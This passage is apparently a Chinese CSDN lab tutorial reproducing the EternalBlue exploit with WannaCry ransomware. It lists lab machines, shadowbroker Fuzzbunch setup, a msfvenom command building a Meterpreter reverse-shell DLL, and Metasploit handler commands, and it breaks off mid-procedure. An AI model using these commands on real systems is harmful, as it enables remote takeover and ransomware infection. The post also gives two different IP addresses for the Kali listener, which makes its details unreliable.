永恒之蓝(勒索病毒)复现与利用

本文详细介绍了永恒之蓝勒索病毒的复现过程,包括所需环境、工具及攻击环节。通过在Windows Server 2003上运行利用脚本对开启445端口的Windows 2007发起攻击,利用Meterpreter回连到Kali系统,最终成功获取目标系统的shell并可进行勒索操作。
摘要由CSDN通过智能技术生成

整个的复现的过程需要的环境以及工具有:

  1. kali 2.0:用来监听获取反弹的shell。ip:192.168.15.174

  2. winsever 2003 :需要装上python环境,勒索病毒攻击机。ip:192.168.15.141

  3. win2007 :靶机,确保445端口开启。ip:192.168.15.144

  4. 永恒之蓝利用脚本shadowbroker-master以及勒索病毒wcry.exe,脚本shadowbroker-master的文件夹放在server2003 C盘根目录下,勒索病毒在kali的根目录下。
    在这里插入图片描述

  5. python2.6已经在winsever下装python需要的环境pywin32-221.win32.在sever2003中分别安装这些文件,并配置python环境变量,确保python能够正常运行
    在这里插入图片描述
    攻击环节:
    1.在2003中修改C:\shadowbroker-master\windows下的Fuzzbunch.xml文件,修改内容如下,在这里要找到对应文件中的Resources文件的位置,然后对这个xml文件进行修改。在c:\的根目录下创建logs文件。
    在这里插入图片描述
    2.在kali上创建回链文件s.dll 命令如下:

    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.15.128 LPORT=4444 -f dll > s.dll
    在这里插入图片描述
    在生成文件后,把s.dll文件放到2003的根目录下,其中lhost中的ip地址为kali的ip 端口是随机的未占用端口。

3.在kali上运行,msfconsole,进行监听,命令如
msfconsole
use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值